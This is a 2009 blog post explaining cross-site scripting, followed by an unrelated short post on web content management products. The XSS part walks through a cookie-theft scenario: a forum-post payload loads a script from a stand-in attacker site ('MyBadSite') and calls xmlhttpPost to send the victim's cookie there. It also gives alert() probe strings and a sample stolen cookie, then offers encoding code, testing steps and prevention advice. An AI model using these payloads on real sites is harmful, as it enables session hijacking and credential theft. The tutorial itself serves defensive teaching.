Saturday, November 14, 2009

Protect your web application from Cross Site Scripting Attacks

Introduction:
Recently I worked on a Portal project for one of the largest telecommunication companies in the world. Development was almost complete when the application went through a security scan, just a few days before go-live. The scan found security vulnerabilities, and that forced a lot of code changes at the last minute. One of the major problems was a cross site scripting vulnerability. Briefly, cross site scripting is a hacking technique that allows an attacker to send malicious content to an end user through a vulnerable web application and collect some type of data from the victim. Cross site scripting is believed to be one of the most common application layer hacking techniques.

This document explains what cross site scripting is, how attackers perform a cross site scripting attack, how developers can resolve it, and how testers can test for it. We all know that “prevention is better than cure”, so the document ends by explaining how cross site scripting attacks can be prevented.

What is cross site scripting?
Technically, cross site scripting builds on the ability of web browsers to let a page from one web application execute JavaScript stored on another web site. Let us consider two web sites, http://localhost:8080/MyGoodSite and http://localhost:8080/MyBadSite (the names are chosen on purpose). The good site has a login screen which needs JavaScript validation when the login button is clicked. The login page may contain the following lines of code.
<HTML>
<HEAD>
<TITLE> Login to www.MyGoodSite.com </TITLE>
</HEAD>
<script src=" http://localhost:8080/MyBadSite/js/validation.js"></script>
<script>
…..
…..
<input type="button" onclick="javascript:validateLogin();return false;" value="Login">
…..
</HTML>

Here the JavaScript function validateLogin is written in a JavaScript file, validation.js, which is stored in another web application, MyBadSite. This works fine.
The advantage of storing the validation script in a separate web site is that it can easily be re-used in other applications and maintained efficiently from a single place.
Every good thing has a bad side as well, and this is no exception. Hackers and attackers can abuse this capability. Let us see below, with an example, how it can be done.

How can attackers find vulnerable web sites?
The first thing attackers need to do is find a site that is vulnerable to cross site scripting. The main targets are web sites that generate web pages dynamically without much security checking. Today social networking web sites are a common place to share information and thoughts with the entire world. Users can generate their own content; they can even provide links to other web sites. Whatever text they enter in an input box (text area or text box), they expect to see the same text on the web page. If that text is not encoded properly, it can be used to inject malicious code into the web page. Attackers may find such web sites and perform a simple test to check whether the site is vulnerable.
Let us consider a web site where the home page (home.jsp) displays the logged-in user name as a welcome message, and the login name is passed as a parameter in the URL.
Part of the home.jsp code may look as follows:


<HTML>
<HEAD>
<TITLE> Welcome to www.MyGoodSite.com </TITLE>
</HEAD>
<%
String userId = (String)request.getParameter("userId");
%>
<TABLE width="640">
<TR>
<TD width="640" align="right"> Welcome <b><%=userId%></b></TD>
</TR>
</TABLE>
…..
…..
</form>
</BODY>
</HTML>

The good URL to access this page will look like http://localhost:8080/MyGoodSite/home.jsp?userId=john. It shows the message “Welcome john” on the home page. Now simply type the following URL in a web browser
http://localhost:8080/MyGoodSite/home.jsp?userId=<script>alert('this is a vulnerable site')</script>

You see the below alert instead of the welcome message:


    This is a success for the attacker. The first move of the attack has worked.
    A similar situation can arise in social networking web sites. Developers might choose to pass the text entered by users through URL parameters. In another situation, a user searches for some text and the developers implement a “not found” message by passing the entered search string as a URL parameter. Also consider a web site that offers an option to send greeting cards, where the user wants to preview how the greeting message will look. Developers might decide to implement this by passing the entered message as a parameter.
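To make the home.jsp case concrete, here is a minimal Java sketch of what happens on the server when a URL parameter is written into the page unchanged. The class name ReflectedParameterDemo and its two methods are hypothetical and only imitate the JSP above; they are not part of the original application. The sketch assumes Java 10 or later for URLDecoder.decode with a Charset argument.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

// Hypothetical stand-in for home.jsp: it reads userId from the query string
// and writes it into the HTML without any encoding.
final class ReflectedParameterDemo {

    // Extracts and URL-decodes the userId value from a raw query string.
    static String userIdFrom(String query) {
        for (String pair : query.split("&")) {
            int eq = pair.indexOf('=');
            if (eq > 0 && pair.substring(0, eq).equals("userId")) {
                return URLDecoder.decode(pair.substring(eq + 1), StandardCharsets.UTF_8);
            }
        }
        return "";
    }

    // Mirrors <%=userId%> in home.jsp: the value is concatenated as-is.
    static String renderWelcome(String userId) {
        return "<TD width=\"640\" align=\"right\"> Welcome <b>" + userId + "</b></TD>";
    }

    public static void main(String[] args) {
        // A normal request and a probing request with a URL-encoded script tag.
        System.out.println(renderWelcome(userIdFrom("userId=john")));
        System.out.println(renderWelcome(
                userIdFrom("userId=%3Cscript%3Ealert('this is a vulnerable site')%3C%2Fscript%3E")));
    }
}
```

The second line printed contains a complete script element inside the table cell, which is exactly what the browser then executes.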

    How do attackers perform a cross site scripting attack?

    Once such a vulnerable site is found, the only thing the attacker has to do is create a web site (in this case MyBadSite) which will be the source of the malicious code. This code will be injected into the vulnerable site through cross site scripting. In this example we assume that the attacker writes an AJAX-based JavaScript function, xmlhttpPost, which reads the victim's cookie information and silently sends it to the attacker. The trick is that the JavaScript needs to be executed on the victim's machine to retrieve his or her private information. So the attacker will try to lure the victim by sending links through email, advertisement pop-ups and so on.

    The sequence of steps performed by the attacker and the user during an attack is explained below.

    We will consider the case of a social networking web site with a discussion forum. It is assumed that after a successful login the user id and password are stored in a cookie. The appendix section provides the code used to perform the attack.

    1. Community User Alice logs into the site MyGoodSite.
    2. The user credentials and other personal information are stored in a cookie, as this is how personalization is implemented in MyGoodSite.
    3. Alice opens a discussion thread on some topic, asking for people's opinions on it.
    4. Bob runs a vulnerability test against MyGoodSite and finds that the site is vulnerable to cross site scripting.
    5. Bob posts a message like this:
    You can find related information <script language="Javascript" src="http://localhost:8080/MyBadSite/js/ajaxwrite.js"></script><a href = "javascript:xmlhttpPost('http://localhost:8080/MyBadSite/writecookie.jsp')"> here</a>
    6. In the browser it appears as “You can find related information here”, where “here” is a link.
    7. Alice clicks on the link text “here”.
    8. The code in step 5 first downloads the JavaScript file ajaxwrite.js from MyBadSite. The browser trusts the script because it is loaded by a page served from MyGoodSite. xmlhttpPost is a function within the ajaxwrite.js file, so it is executed.
    9. The cookie information from Alice's machine is then silently transferred to Bob's machine, because the link calls the AJAX-based JavaScript without her noticing. The cookie will be available in the following format:
    “Cookie Info=password=Alice123; username=Alice; JSESSIONID=B7C0B46100D622678703B9501EB9FC51”
    Once the cookie information is received by Bob, he might misuse Alice’s account.

    This is a simple example of how personal information can be retrieved using cross site scripting. Several other types of attack can be performed using cross site scripting. Some of them are listed below.
    Account hijacking - An attacker can hijack the user's session before the session cookie expires and take actions with the privileges of the user who accessed the URL, such as issuing database queries and viewing the results.
    Malicious script execution - Users can unknowingly execute JavaScript, VBScript, ActiveX, HTML, or even Flash content that has been inserted into a dynamically generated page by an attacker.
    Worm propagation - With Ajax applications, XSS can propagate somewhat like a virus. The XSS payload can autonomously inject itself into pages, and easily re-inject the same host with more XSS, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods to propagate itself invisibly to the user.
    Information theft - Via redirection and fake sites, attackers can connect users to a malicious server of the attacker's choice and capture any information entered by the user.
    Denial of Service - Often by utilizing malformed display requests on sites that contain a Cross-Site Scripting vulnerability, attackers can cause a denial of service condition by making the host site query itself repeatedly.
    Browser Redirection - On certain types of sites that use frames, a user can be made to think that he is still on the original site when he has in fact been redirected to a malicious one, since the URL in the browser's address bar remains the same. This is because the entire page isn't being redirected, just the frame in which the JavaScript is being executed.
    Manipulation of user settings - Attackers can change user settings for nefarious purposes.
    Changing the theme of the page - Instead of injecting a script tag, attackers can include other HTML tags such as <style> or <img> to change the layout of the page.

    Cross site scripting can generally be subdivided into two categories: stored and reflected attacks. The main difference between the two is in how the payload arrives at the server. Stored attacks are just that: the attack code is stored in some form on the target server, such as in a database, or via a submission to a bulletin board or visitor log. The victim retrieves and executes the attack code in his browser when a request is made for the stored information. Reflected attacks, on the other hand, come from somewhere else. They happen when user input from a web client is immediately included via server-side scripts in a dynamically generated web page. Via some social engineering, such as a malicious link or a "rigged" form, an attacker can trick a victim into submitting information which has been altered to include attack code and is then sent to the legitimate server. The injected code is then reflected back to the user's browser, which executes it because it came from a trusted server. The implications of each kind of attack are the same.

    How can developers resolve it?
    Cross-Site Scripting attacks can be avoided by carefully validating all input and properly encoding all output. Encoding of output ensures that any scriptable content is properly encoded for HTML before being sent to the client. In ASP.NET, for example, this is done with the function HttpUtility.HtmlEncode, as shown in the following Label control sample:

    Label2.Text = HttpUtility.HtmlEncode(input)

    Be sure to consider all paths that user input takes through your application. For instance, if data is entered by the user, stored in a database, and then redisplayed later, you must make sure it is properly encoded each time it is retrieved. If you must allow free-format text input, such as in a message board, and you wish to allow some HTML formatting to be used, you can handle this safely by explicitly allowing only a small list of safe tags. Here is an example of the encoding step:

    Java Example:
    import java.text.StringCharacterIterator;

    // Place this method inside a class. It replaces the characters that are
    // significant in HTML with their entity equivalents.
    public static String HTMLEncode(String aTagFragment) {
        final StringBuilder result = new StringBuilder();
        final StringCharacterIterator iterator = new StringCharacterIterator(aTagFragment);
        char character = iterator.current();

        while (character != StringCharacterIterator.DONE) {
            if (character == '<') {
                result.append("&lt;");
            } else if (character == '>') {
                result.append("&gt;");
            } else if (character == '"') {
                result.append("&quot;");
            } else if (character == '\'') {
                result.append("&#039;");
            } else if (character == '\\') {
                result.append("&#092;");
            } else if (character == '&') {
                result.append("&amp;");
            } else {
                // the char is not a special one; add it to the result as is
                result.append(character);
            }
            character = iterator.next();
        }
        return result.toString();
    }
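The "small list of safe tags" idea mentioned above can be sketched as follows: encode everything first, then turn back only the exact tags you have decided to allow. This is a minimal illustration under assumptions, not a complete sanitizer. The class SafeTagFormatter and the choice of b, i and u as allowed tags are hypothetical, and matching is deliberately limited to lowercase tags without attributes.

```java
// Hypothetical helper: HTML-encodes all input, then re-enables a short
// allowlist of attribute-free formatting tags.
final class SafeTagFormatter {

    // Assumed allowlist; anything not listed here stays encoded.
    private static final String[] ALLOWED_TAGS = {"b", "i", "u"};

    // Encodes the characters that are significant in HTML.
    // The ampersand is replaced first so later entities are not double-encoded.
    static String encode(String input) {
        return input.replace("&", "&amp;")
                    .replace("<", "&lt;")
                    .replace(">", "&gt;")
                    .replace("\"", "&quot;")
                    .replace("'", "&#39;");
    }

    // Encodes the input and then restores only the exact allowed tags.
    static String format(String input) {
        String result = encode(input);
        for (String tag : ALLOWED_TAGS) {
            result = result.replace("&lt;" + tag + "&gt;", "<" + tag + ">")
                           .replace("&lt;/" + tag + "&gt;", "</" + tag + ">");
        }
        return result;
    }

    public static void main(String[] args) {
        System.out.println(format("<b>hi</b><script>alert(1)</script>"));
    }
}
```

Because only the exact strings for the allowed tags are restored, a tag that carries attributes, such as an onclick handler, remains encoded and is shown as text.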

    How can testers test for it?
    The following steps outline how to manually test an application for Cross-Site Scripting.
    Step 1. Open the Web site you are testing in a browser, and look for places on the site that accept user input, such as a search form or some kind of login page. Enter the word test in the search box and send this to the Web server.
    Step 2. Look for the Web server to respond back with a page similar to something like "Your search for 'test' did not find any items" or "Invalid login test." If the word "test" appears in the results page, you are in luck.
    Step 3. To test for Cross-Site Scripting, input the string "<script>alert('hello')</script>" without the quotes in the same search or login box you used before and send this to your Web server.
    Step 4. If the server responds back with a popup box that says "hello", then the site is vulnerable to Cross-Site Scripting.
    Step 5. If Step 4 fails and the Web site does not return this information, you still might be at risk. Click the 'View Source' option in your browser so you can see the actual HTML code of the Web page. Now find the <script> string that you sent to the server. If you see the entire "<script>alert('hello')</script>" text, unencoded, in this source code, then the Web server is vulnerable to Cross-Site Scripting.
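The source check in Step 5 can be partly automated. The sketch below assumes the tester has already fetched the response HTML as a string; the class XssProbeCheck and its Result values are hypothetical names, and the "encoded" branch is only a rough heuristic that looks for an encoded script tag.

```java
// Hypothetical helper for Step 5: inspects a response body for the probe string.
final class XssProbeCheck {

    // The same probe string used in Step 3.
    static final String PROBE = "<script>alert('hello')</script>";

    enum Result { REFLECTED_RAW, REFLECTED_ENCODED, NOT_REFLECTED }

    // Classifies the page source returned after submitting the probe.
    static Result classify(String responseHtml) {
        if (responseHtml.contains(PROBE)) {
            // The probe came back unchanged, so the browser would run it.
            return Result.REFLECTED_RAW;
        }
        if (responseHtml.contains("&lt;script&gt;")) {
            // The input was echoed, but as harmless text.
            return Result.REFLECTED_ENCODED;
        }
        return Result.NOT_REFLECTED;
    }

    public static void main(String[] args) {
        System.out.println(classify("Your search for " + PROBE + " did not find any items"));
    }
}
```

Only REFLECTED_RAW indicates the vulnerability described in Steps 4 and 5. The other two results do not prove the page is safe, since input may also be reflected in other contexts.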

    How to prevent cross site scripting?
    The following recommendations will help you build web applications capable of withstanding Cross-Site Scripting attacks.
    Define what is allowed. Ensure that the web application validates all input parameters (cookies, headers, query strings, forms, hidden fields, etc.) against a stringent definition of expected results.
    Check the response from POST and GET requests to ensure what is being returned is what is expected, and is valid.
    Remove conflicting characters, brackets, and single and double quotes from user input by encoding user supplied data. This will prevent inserted scripts from being sent to end users in a form that can be executed.
    Whenever possible, limit all client-supplied data to alphanumeric data. Using this filtering scheme, if a user entered "<script>alert(document.cookie)</script>", it would be reduced to "scriptalertdocumentcookiescript". If non-alphanumeric characters must be used, encode them as HTML entities before using them in an HTTP response, so that they cannot be used to modify the structure of the HTML document.
    Use two-factor customer authentication mechanisms as opposed to single-factor authentication.
    Verify the origin of scripts before you modify or utilize them.
    Do not implicitly trust any script given to you by others (whether downloaded from the web, or given to you by an acquaintance) for use in your own code.
    A custom JSP tag can be implemented to render dynamic content on the web page. The tag implementation can encode the text to be displayed on the web page. This is very effective from a maintenance perspective, as any change in the encoding logic needs a code change in one place only.
    Use an automated application vulnerability assessment tool, such as AppScan from Sanctum or WebInspect from HP.
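Two of the recommendations above, validating input against a strict definition and limiting data to alphanumeric characters, can be sketched in a few lines of Java. The class InputRules and the user id rule (3 to 20 letters, digits or underscores) are assumptions made for illustration; a real application would define its own rules per field.

```java
import java.util.regex.Pattern;

// Hypothetical validation helpers for the recommendations above.
final class InputRules {

    // Assumed rule: a user id is 3 to 20 letters, digits or underscores.
    private static final Pattern USER_ID = Pattern.compile("[A-Za-z0-9_]{3,20}");

    // "Define what is allowed": accept only values matching the strict pattern.
    static boolean isValidUserId(String value) {
        return value != null && USER_ID.matcher(value).matches();
    }

    // "Limit client-supplied data to alphanumeric data": drop everything else.
    static String keepAlphanumeric(String value) {
        return value.replaceAll("[^A-Za-z0-9]", "");
    }

    public static void main(String[] args) {
        System.out.println(isValidUserId("john"));
        System.out.println(keepAlphanumeric("<script>alert(document.cookie)</script>"));
    }
}
```

Rejecting invalid input is usually easier to reason about than silently stripping characters. The stripping variant is shown here only because it matches the filtering scheme described in the list.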


    Conclusion:
    Cross Site Scripting attack is one of the most common application level attacks that hackers use to sneak into web applications today, and one of the most dangerous. Around 27% of the internet attackers use this mechanism of attack. Cross Site Scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unfortunately, as outlined in this paper, this is often done without the knowledge of either the client or the organization being attacked. In order to prevent this malicious vulnerability, it is critical that an organization implement both an online and offline security strategy.
    All types of web applications, including internet and intranet applications, can be attacked using cross site scripting. So every internet and intranet project should reserve some effort to prevent this issue by educating developers well in advance. Developers should strictly follow the recommendations above from the beginning of development; otherwise the impact will be very high if the code changes have to be made at the end of the project.

    Web Content Management System - A Basic Corporate Need

    This article provides a basic overview of Web Content Management (WCM) systems. Let us first discuss why we need a WCM system. Remember the web sites of earlier days, where web pages, once created, were never changed. Changing a single line of content required a web developer's help. Now the requirements have changed, and static web sites no longer meet users' demands. Today's Internet users want to create their own content and see it live on the web site immediately, the way I would like to view this blog.
    Companies have different requirements. Once they create web content, they like to publish it through multiple channels: corporate web sites, press releases, company brochures and email campaigns. Maintaining the consistency of data across all these delivery channels is a challenge without a robust content management system. Today, in the age of globalization, companies also need to deliver content in multiple languages without redeveloping the entire web site or Portal. Publishing content at the company's standard of quality is also important. Companies do not want to depend on web developers to publish content; business users should be able to publish it themselves. Collaborative content creation is another major demand from business nowadays. It helps to create content not only quickly but also with great quality.
    To satisfy all these demands we need a robust web content management system. The following diagram explains how a web content management system works.

    Below is a step by step explanation of how the WCM system works.
    1. Content authors create web content in the WCM system. The content is stored in a standard format such as XML. Authors can preview web content based on pre-defined templates called presentation templates. These templates make it possible to create multiple views of the same web content, including views for multiple delivery channels. Once authors have finished entering content, they forward it to content reviewers and approvers.
    2. Content reviewers review the content. If they are not satisfied with it, they send it back to the author for further modification; otherwise they send it to the content approvers for approval. Content approvers are the final authority who decide when to publish the web content.
    3. Once the content approvers approve the content, the desired format of the content is published to the designated delivery channel as per the publishing configuration. The web viewable format of the content is published to the web site or Portal.
    4. The WML (Wireless Markup Language) format of the content is published to application servers that support WAP (Wireless Application Protocol) enabled devices such as mobile phones.
    5. The printer friendly format of the content is published to the Print Server, for printing in press.
    6. The email friendly format of the content is sent out by email for email campaigns or newsletters.
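The author, reviewer and approver steps above amount to a small state machine. The following Java sketch is one way to picture it; the class ContentWorkflow, its state names and its channel names are hypothetical and do not come from any particular WCM product.

```java
import java.util.EnumSet;
import java.util.Set;

// Hypothetical model of the authoring, review, approval and publishing steps.
final class ContentWorkflow {

    enum State { DRAFT, IN_REVIEW, AWAITING_APPROVAL, PUBLISHED }

    // Delivery channels from steps 3 to 6: web site, WAP devices, print, email.
    enum Channel { WEB, WAP, PRINT, EMAIL }

    private State state = State.DRAFT;
    private final Set<Channel> publishedTo = EnumSet.noneOf(Channel.class);

    // Step 1: the author forwards the content to the reviewers.
    void submitForReview() { require(State.DRAFT); state = State.IN_REVIEW; }

    // Step 2: the reviewer either sends it back or passes it to the approver.
    void sendBackToAuthor() { require(State.IN_REVIEW); state = State.DRAFT; }
    void passReview() { require(State.IN_REVIEW); state = State.AWAITING_APPROVAL; }

    // Steps 3 to 6: approval publishes the content to the configured channels.
    void approve(Set<Channel> channels) {
        require(State.AWAITING_APPROVAL);
        publishedTo.addAll(channels);
        state = State.PUBLISHED;
    }

    State state() { return state; }
    Set<Channel> publishedTo() { return publishedTo; }

    // Rejects transitions that skip a step in the workflow.
    private void require(State expected) {
        if (state != expected) {
            throw new IllegalStateException("Expected " + expected + " but was " + state);
        }
    }

    public static void main(String[] args) {
        ContentWorkflow item = new ContentWorkflow();
        item.submitForReview();
        item.passReview();
        item.approve(EnumSet.of(Channel.WEB, Channel.EMAIL));
        System.out.println(item.state() + " to " + item.publishedTo());
    }
}
```

The point of the sketch is that content cannot reach a delivery channel without passing through review and approval, which is what lets business users publish without depending on developers.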

    A web content management system allows a business to publish the right format of the content to the right delivery channel at the right time.

    There are several industry standard Web Content Management tools available in the market that provide an end to end WCM solution.

    Below are a few market leaders in the WCM space -

    • Oracle UCM Web Content Management - This is the WCM product formerly known as Stellent. You can develop your web sites very quickly using this product. It provides a very good user interface for creating or modifying content, and it offers in-context editing of the content. It also provides a set of pre-defined templates to jump start your web site development.
    • Vignette Web Content Management Solutions - This tool enables us to build high performing web sites. It is currently part of Open Text, which has a clear focus on retaining this tool as one of the WCM market leaders. The tool provides a robust web content management system with a high performing caching mechanism.
    • EMC Documentum Web Content Management - Being a leader in the Enterprise Content Management (ECM) space, EMC Documentum provides a robust end to end Web Content Management solution too. It provides a flexible way to create web content for multiple devices in multiple formats. It provides out of the box integration with industry leading application and Portal servers.
    • Autonomy Interwoven Web Content Management - Provides a very good user interface for creating content. Stores the content in a very flexible format. The publishing tool from Interwoven supports a wide range of sources and targets. Offers a very good preview feature for content authors and reviewers.
    • There are several open source WCM products available in the market, with Alfresco in the leading position. It makes it possible to build low cost, efficient web sites and Portals.